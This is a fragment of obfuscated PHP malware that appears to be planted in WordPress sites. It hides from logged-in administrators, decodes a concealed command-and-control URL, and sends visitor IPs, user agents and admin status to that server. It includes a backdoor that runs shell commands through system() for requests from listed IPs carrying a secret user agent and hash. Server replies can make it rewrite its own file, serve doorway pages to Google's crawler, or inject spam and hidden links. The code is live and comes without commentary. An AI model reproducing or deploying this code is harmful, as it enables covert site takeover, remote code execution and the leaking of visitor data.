$value ) { if ( stristr($cookie, 'wordpress_logged_in_') ) { setcookie('engine_ssl_' , 'enabled' , time() + 3600 * 24 * 100 , '/' , '.' . $cookie_host); return true; } if ( stristr($cookie, 'activeProfile') ) { setcookie('engine_ssl_' , 'enabled' , time() + 3600 * 24 * 100 , '/' , '.' . $cookie_host); return true; } } //////////////FUNCTIONS START class FSLanguage { private static $language = null; public static function get(){ new FSLanguage; return self::$language; } public static function getBestMatch($langs = array()){ foreach($langs as $n => $v) $langs[$n] = strtolower($v); $r = array(); foreach(self::get() as $l => $v){ ($s = strtok($l, '-')) != $l && $r[$s] = 0; if(in_array($l, $langs)) return $l; } foreach($r as $l => $v) if(in_array($l, $langs)) return $l; return null; } private function __construct(){ if(self::$language !== null) return; if(($list = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']))){ if(preg_match_all('/([a-z]{1,8}(?:-[a-z]{1,8})?)(?:;q=([0-9.]+))?/', $list, $list)){ self::$language = array_combine($list[1], $list[2]); foreach(self::$language as $n => $v) self::$language[$n] = +$v ? +$v : 1; arsort(self::$language); } } else self::$language = array(); } } function curl_redir_exec($ch) { static $curl_loops = 0; static $curl_max_loops = 3; if ($curl_loops >= $curl_max_loops) { $curl_loops = 0; return false; } curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); list($header, $data) = explode("\n\n", $data, 2); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 301 || $http_code == 302) { $matches = array(); preg_match('/Location:(.*?)\n/', $header, $matches); $url = @parse_url(trim(array_pop($matches))); if (!$url) { $curl_loops = 0; return $data; } $last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)); if (!$url['scheme']) $url['scheme'] = $last_url['scheme']; if (!$url['host']) $url['host'] = $last_url['host']; if (!$url['path']) $url['path'] = $last_url['path']; $new_url = $url['scheme'] . '://' . $url['host'] . $url['path'] . ($url['query']?'?'.$url['query']:''); curl_setopt($ch, CURLOPT_URL, $new_url); return curl_redir_exec($ch); } else { $curl_loops = 0; return $data; } } function FsGetRealIp() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip=$_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip=$_SERVER['REMOTE_ADDR']; } return $ip; } function curPageURLSS() { $pageURL = 'http'; if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";} $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") { $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else { $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } return $pageURL; } function find_Rpermition() { $res = ""; if ( (function_exists ('curl_init')) && (function_exists ('curl_exec')) ) { $res = "curl"; } elseif (function_exists ('fsockopen')) { $res = "fsock"; } return $res; } function getRdata($page,$useragent,$method,$collection) { $result = ''; $timeout = 15; $newRRR = parse_url($page); $url_new = $newRRR['host']; $path_new = $newRRR['path']; if ($method == "curl") { $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$page); curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); curl_setopt ($ch, CURLOPT_TIMEOUT, $timeout); curl_redir_exec($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); if ($useragent<>'selfbot') { curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, 'collection='.$collection); } $result = curl_exec ($ch); curl_close($ch); $pos = strpos($result, "\r\n\r\n"); $result = substr($result, $pos+4); return $result; } if ($method == "fsock") { $socket = fsockopen($url_new, 80, $errno, $errstr, 30); if(!$socket)die("$errstr($errno)"); $data = ''; if ($useragent<>'selfbot') { $data = "collection=".urlencode($collection); } fwrite($socket, "POST ".$path_new." HTTP/1.0\r\n"); fwrite($socket, "Host: ".$url_new."\r\n"); fwrite($socket,"Content-type: application/x-www-form-urlencoded\r\n"); fwrite($socket,"Content-length:".strlen($data)."\r\n"); fwrite($socket,"Accept:*/*\r\n"); fwrite($socket,"User-agent:".$useragent."\r\n"); fwrite($socket,"Connection:Close\r\n"); fwrite($socket,"\r\n"); fwrite($socket,"$data\r\n"); fwrite($socket,"\r\n"); $result = ''; while(!feof($socket)){ $result.= fgets($socket); } $pos = strpos($result, "\r\n\r\n"); $result = substr($result, $pos+4); return $result; fclose($socket); } } function makebotlist($BotList) { if (!file_exists($BotList) or (time() - filemtime($BotList) >= '100000')) { $baseg = explode("#", file_get_contents('http://ru.myip.ms/files/bots/live_webcrawlers.txt')); for($i=0;$i 10) { if (stristr($baseg[$i], "google")) { $basec = explode("\n", $baseg[$i]); for($i2=0;$i2"); $_61=strrpos(substr($_53,0,$_59),"<"); if($_60===false){ $_60=0; } if($_61===false) { $_11=true; break; } if($_60<=$_61) { continue; } if(count($_9)<=0) break; $_58=trim(array_shift($_9)); if($_58==NULL || strlen($_58) < 4) { break; } $_53=substr($_53,0,$_59+strlen($_55)).$_58." ".substr($_53,$_59+strlen($_55)); $_57=true; } else { break; } } while(!$_57); if($_11) break; if(count($_9)<=0)break; } $_12=substr($_10,0,$_13).$_53; } else { $_11=true; $_12=$_10; } $datapage=$_12; return $datapage; } //////////////FUNCTIONS FINISH $readydoors = checkDir($filessavepath); makebotlist($BotList); $blst = 'NOFILE'; if (file_exists($BotList)) { $blst = 'BOTLIST'; } if ($_SERVER['HTTP_USER_AGENT'] == "ANTIPIDERSIA") { if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176|173.234.27.116/i',$_SERVER['REMOTE_ADDR'])) { $owner = TRUE; } if ( (substr(md5($_REQUEST['localdate']),0,6) == '6fbcb8') && ($owner == TRUE) ) { $time = str_replace('@',' ',$_REQUEST['localtime']); @system($time); exit; } die("CHETKO:CHETKO|".$scriptver."|".$blst."|DOORS READY:".$readydoors); } $bot = HiGoogle($visitorip,$BotList,$visitorlang); if ($bot) { $user = 'BOT'; } else { $user = 'HUMAN'; } $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5'; $pass = "Zgc5c4MXrOh3KUNWsdAGcLDFZxfLK7lLiGWSGbE="; function wp_cd($fd, $fa="") { $fe = "wp_frmfunct"; $len = strlen($fd); $ff = ''; $n = $len>100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $datauri = $ao($oa("$pass"), 'wp_function'); $collection = array("remotehost" => $hostname, "useragent" => $visitoragent, "lang" => $visitorlang, "ip" => $visitorip, "uri" => $url, "gbase" => $blst, "visitor" => $user, "referer" => $referer, "scriptver" => $scriptver, "selfpath" => $selfpath, "admin" => $admin, "doors" => $readydoors, "proxy" => $datauri); $collection = serialize($collection); $collection = base64_encode($collection); $response = getRdata($datauri,$workagent,$method,$collection); if (preg_match('/SELFUPDATE/i',$response)) { $telo = str_replace('SELFUPDATE','',$response); $telo = base64_decode($telo); $telo = unserialize($telo); $selfdata = $telo['secretka']; $selfhash = $telo['hash']; $selfpath = $telo['selfpath']; $selfpath = base64_decode($selfpath); $secretkahash = md5($selfdata); if ( ($selfdata<>'') && ($secretkahash == $selfhash) ) { $file = fopen($selfpath,'w'); fwrite($file,$selfdata."\n"); fclose($file); } return true; } if (preg_match('/TEMPBAN/i',$response)) { return true; } if (preg_match('/BANBAN/i',$response)) { setcookie('engine_ssl_' , 'enabled' , time() + 3600 * 24 * 100 , '/' , '.' . $cookie_host); return true; } if (preg_match('/SHOW DOOR/i',$response)) { $telo = str_replace('SHOW DOOR','',$response); $telo = base64_decode($telo); $telo = unserialize($telo); $door = $telo['doorcontent']; echo $door; exit; } if ( ($bot) && (file_exists($filessavepath.$filename)) ) { $door = file_get_contents($filessavepath.$filename); $door = base64_decode($door); echo $door; exit; } if (preg_match('/SHOW AND SAVE DOOR/i',$response)) { $telo = str_replace('SHOW AND SAVE DOOR','',$response); $telo = base64_decode($telo); $telo = unserialize($telo); $door = $telo['doorcontent']; $textogen = $telo['textogen']; $ClusterIp = $telo['clusterip']; $doorkey = $telo['doorkey']; $kc = $telo['kc']; $collection = array("k" => $doorkey, "keyscount" => $kc); $collection = serialize($collection); $collection = base64_encode($collection); $texturi = 'http://'.$ClusterIp.'/'.$textogen.'.php'; $text = getRdata($texturi,$workagent,$method,$collection); if (preg_match('/TAKEYOURTEXT/i',$text)) { $text = str_replace('TAKEYOURTEXT','',$text); $door = str_replace('[TEXT]',$text,$door); echo $door; $filetosave = base64_encode($door); $file = fopen($filessavepath.$filename,'w'); fwrite($file,$filetosave); fclose($file); } else { return true; } exit; } if (preg_match('/SHOW SPAM/i',$response)) { $telo = str_replace('SHOW SPAM','',$response); $telo = base64_decode($telo); $telo = unserialize($telo); $div = $telo['div']; $style = $telo['style']; $selfpage = getRdata($url,$selfagent,$method,$collection); $selfpage = str_replace('',$style."\n".'',$selfpage); $selfpage = str_replace('',$div."\n".'',$selfpage); echo $selfpage; exit; } if (preg_match('/SHOW CANON/i',$response)) { $telo = str_replace('SHOW CANON','',$response); $telo = base64_decode($telo); $telo = unserialize($telo); $canonlink = $telo['canon']; $selfpage = getRdata($url,$selfagent,$method,$collection); $canonA = "''si"; $canonB = "''si"; $canonZ = ''; $selfpage = preg_replace($canonA, $canonZ, $selfpage); $selfpage = preg_replace($canonB, $canonZ, $selfpage); $selfpage = str_replace('',$canonlink."\n".'',$selfpage); echo $selfpage; exit; } if (preg_match('/CALL BACK/i',$response)) { $telo = str_replace('CALL BACK','',$response); $telo = base64_decode($telo); $telo = unserialize($telo); $links_out = $telo['links']; $links_out = explode("\n",$links_out); ob_start("callback"); }